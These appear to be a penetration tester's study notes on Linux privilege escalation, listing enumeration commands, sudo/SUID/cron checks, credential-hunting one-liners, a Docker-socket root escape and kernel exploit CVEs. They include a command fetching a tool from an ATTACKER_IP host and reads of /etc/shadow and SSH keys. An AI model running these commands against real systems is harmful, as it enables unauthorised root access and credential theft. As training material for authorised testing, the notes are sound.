Pentest_Notes

🐧 Privilege Escalation — Linux

Organized notes for Linux privilege escalation techniques. Last Updated: 2026-03-27

Overview

Linux privilege escalation involves going from a low-privileged user to root. The methodology is: enumerate everything, find misconfigurations, and exploit them.

Enumeration

Checklist

Quick History Check (Also Good for Attack Box)

history 0 | grep <command>

System Information

# Basic system info
hostname
uname -a
cat /etc/os-release
lscpu
uptime -p

# User activity
w
last
lastlog

# Currently logged-in users
who

LinPEAS

# Run with 5-minute timeout
timeout 5m ./linpeas.sh

# Transfer LinPEAS to target
# From attacker: python3 -m http.server 80
# On target: wget http://<ATTACKER_IP>/linpeas.sh && chmod +x linpeas.sh

⚠️ CPTS Exam Tip: Pay special attention to red text on yellow background in LinPEAS output — these are the highest-severity findings.

Sudo Abuse

Checklist

Check sudo -l for all allowed commands
Check sudo version for CVEs
Attempt sudo -i with known passwords
Check GTFOBins for sudo entries

# Check sudo privileges
sudo -l

# Attempt direct root shell
sudo -i
sudo su
sudo bash

# Check sudo version
sudo -V

🔗 Reference: GTFOBins — search for any binary found in sudo -l output.

Common Sudo Exploits

CVE	Affected Version	Description
CVE-2021-3156 (Baron Samedit)	sudo < 1.9.5p2	Heap buffer overflow
CVE-2019-14287	sudo < 1.8.28	`sudo -u#-1` bypass
CVE-2019-18634	sudo < 1.8.26	Buffer overflow (pwfeedback)

SUID/SGID Binaries

# Find SUID files
find / -perm /4000 2>/dev/null

# Find SGID files
find / -perm /2000 2>/dev/null

# Find both
find / -perm /6000 2>/dev/null

🔗 Check each SUID binary on GTFOBins for exploitation techniques.

Capabilities

# Find files with capabilities
getcap -r / 2>/dev/null

Common exploitable capabilities

cap_setuid
cap_setgid
cap_dac_override
cap_dac_read_search
cap_net_raw

Cron Jobs & Scheduled Tasks

# Current user cron jobs
crontab -l

# Root cron jobs
sudo crontab -l

# System cron directories
ls -la /etc/cron.daily
ls -la /etc/cron.hourly
ls -la /etc/cron.weekly
ls -la /etc/cron.monthly
ls -la /etc/cron.d/

# System crontab
cat /etc/crontab

# Monitor for cron execution with pspy
timeout 20 ./pspy64

Cron Exploitation

Check if cron scripts are world-writable
Check if cron scripts reference files in writable directories
Check for wildcard injection (e.g., tar *, rsync *)
Check for missing scripts that you can create

File Permissions & World-Writable Files

# World-writable directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null

# World-writable files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

# Files owned by current user
find / -user $(whoami) 2>/dev/null

# Recent files
find / -type f -mmin -60 2>/dev/null

Network & Internal Services

# Open ports / listening services
netstat -tuepn
netstat -tulpn
ss -tulpn

# Network interfaces
ip a
ifconfig

# Routes
ip route
route -n

# Firewall rules
iptables -L -n
cat /etc/iptables/rules.v4

# Listen on interface
sudo tcpdump -i eth0

# ARP table
arp -a

⚠️ CPTS Exam Tip: Internal services listening on localhost (127.0.0.1) may be exploitable — check for web services, databases, etc.

Process Monitoring

# List running processes
ps aux

# Process monitoring with pspy
timeout 20 ./pspy64

# Watch for processes
watch -n 1 'ps aux | grep -v "\[" | head -20'

Credential Hunting

# Check /etc/passwd and /etc/shadow
cat /etc/passwd
cat /etc/shadow

# Command history
cat ~/.bash_history
cat ~/.zsh_history

# Environment variables
env
cat ~/.bashrc
cat ~/.profile

# SSH keys
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"
ls -la ~/.ssh/

# Search for password files
find / -name "*.txt" -o -name "*.cfg" -o -name "*.conf" -o -name "*.ini" -o -name "*.bak" 2>/dev/null | head -50

# Configuration files
for l in $(echo ".conf .config .cnf"); do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core"; done

# Credentials in config files
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib"); do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#"; done

# Database files
for l in $(echo ".sql .db .*db .db*"); do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man"; done

# Text files in home directories
find /home/* -type f -name "*.txt" -o ! -name "*.*"

# Git repositories
find / -type d -name ".git" 2>/dev/null

Docker / Container Escape

# Check if inside Docker
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv

# Check Docker socket
ls -la /var/run/docker.sock

# If Docker group member
docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Kernel Exploits (Last Resort)

# Check kernel version
uname -r
cat /etc/os-release

# Search for kernel exploits
searchsploit linux kernel <version>

🔴 Warning: Kernel exploits can crash the system. Use as a last resort.

Popular kernel exploits

Exploit	Kernel Version	CVE
DirtyPipe	5.8 - 5.16.11	CVE-2022-0847
DirtyCow	2.6.22 - 4.8.3	CVE-2016-5195
PwnKit	polkit < 0.120	CVE-2021-4034

Common Pitfalls / Gotchas

Not checking cron jobs thoroughly (including /etc/cron.d/)
Missing writable scripts called by root processes
Forgetting to check capabilities
Not monitoring processes with pspy
Overlooking internal services on localhost
Not checking Docker group membership
Missing SSH keys in unusual locations

Pentest_Notes

🐧 Privilege Escalation — Linux

Overview

Enumeration

Checklist

Quick History Check (Also Good for Attack Box)

System Information

LinPEAS

Sudo Abuse

Checklist

Common Sudo Exploits

SUID/SGID Binaries

Capabilities

Common exploitable capabilities

Cron Jobs & Scheduled Tasks

Cron Exploitation

File Permissions & World-Writable Files

Network & Internal Services

Process Monitoring

Credential Hunting

Docker / Container Escape

Kernel Exploits (Last Resort)

Popular kernel exploits

Common Pitfalls / Gotchas

References & Further Reading